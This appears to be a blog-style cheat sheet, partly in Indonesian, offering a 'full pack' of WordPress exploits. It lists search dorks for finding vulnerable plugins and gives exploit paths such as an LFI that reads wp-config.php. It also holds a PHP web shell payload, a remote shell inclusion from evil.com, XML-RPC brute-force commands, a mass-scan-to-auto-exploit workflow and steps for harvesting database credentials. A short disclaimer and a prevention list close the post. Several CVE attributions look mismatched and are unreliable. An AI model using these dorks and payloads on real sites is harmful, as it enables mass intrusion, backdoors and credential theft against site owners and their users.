[+] Exploit WordPress Full Pack
Author: 0x6ick
1. WP_File_Manager RCE (CVE-2020-25213 + CVE-2025-0818)
Dork: inurl:/wp-content/plugins/wp-file-manager/
Exploit Path: /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
CVE Terbaru: CVE-2025-0818 - Arbitrary File Deletion
Langkah: Upload shell → akses via URL → full control!
Detection: Check plugin version ≤ 6.9
2. Slider Revolution LFI (CVE-2025-9217)
Dork: inurl:wp-content/plugins/revslider
Exploit: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php [Legacy Method]
Exploit Terbaru: Parameter used_svg dan used_images
Access Level: Contributor+ (Authenticated)
Impact: Read sensitive files (wp-config.php, etc.)
3. Database for Contact Forms RCE (CVE-2025-7384)
Dork: inurl:wp-content/plugins/database-contact-form-7
CVSS: 9.8 (CRITICAL)
Exploit: PHP Object Injection → Remote Code Execution
Installations: 70,000+ sites affected
Langkah: Serialized payload injection → chain gadgets → RCE
4. Advanced File Manager Arbitrary Deletion (CVE-2025-0818)
Dork: inurl:wp-content/plugins/advanced-file-manager
Exploit: Path traversal via elFinder ≤ 2.1.64
Impact: Delete arbitrary files including wp-config.php
5. Theme Editor Backdoor Injection
Dork: intitle:"Site Admin" inurl:/wp-login.php
Prerequisites: Admin access + theme editor enabled
Exploit: Edit footer.php atau functions.php
Langkah: Sisipkan shell base64 → decode via parameter → persistent access
Payload Example:
<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>
Baca juga artikel: exploit joomla full pack
6. XML-RPC Bruteforce & DDoS
Dork: inurl:xmlrpc.php
Exploit: system.multicall untuk multiple auth attempts
Tools: wpscan --enumerate u --password-attack xmlrpc
Impact: Account takeover + amplification attacks
7. WP_Forms Data Exfiltration
Dork: inurl:wp-content/uploads/wpforms
Exploit: Unprotected form submissions containing sensitive data
Langkah: Directory traversal → download .sql/.csv files
8. TimThumb Cache Poisoning
Dork: inurl:timthumb.php?src=
Exploit: timthumb.php?src=http://evil.com/shell.txt&w=100&h=100
Langkah: Remote shell disimpan cache → akses via path cache
Detection: File contains remote URL fetching
9. Plugin Mass Scanner Integration
Tools: wpscan, nuclei, whatweb
Workflow: Dork target → scan plugin → fetch CVE → auto-exploit
Custom Scanner: Gunakan script mass checker untuk bulk verification
10. WP_Config Database Credential Harvesting
Techniques: LFI, backup file discovery, exposed .git/.svn
Langkah: Dump wp-config.php → extract DB credentials → direct database access
Tools & Automation Scripts
WPScan: wpscan --url TARGET --enumerate p --plugins-detection mixed
Nuclei Templates: Pre-built templates for WordPress vulnerabilities
Custom Exploit: Auto-generate payloads based on CVE
⚠️ Disclaimer
This article is intended solely for educational purposes. The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this content.
📊 Detection & Prevention
Patch Management: Update WordPress core dan plugin secara berkala
WAF Configuration: Implementasi Web Application Firewall
Monitoring: File integrity checks + log analysis
Hardening: Disable file editor, restrict XML-RPC, etc.
"Where creativity, exploitation, and expression collide." — 6ickZone
Posting Komentar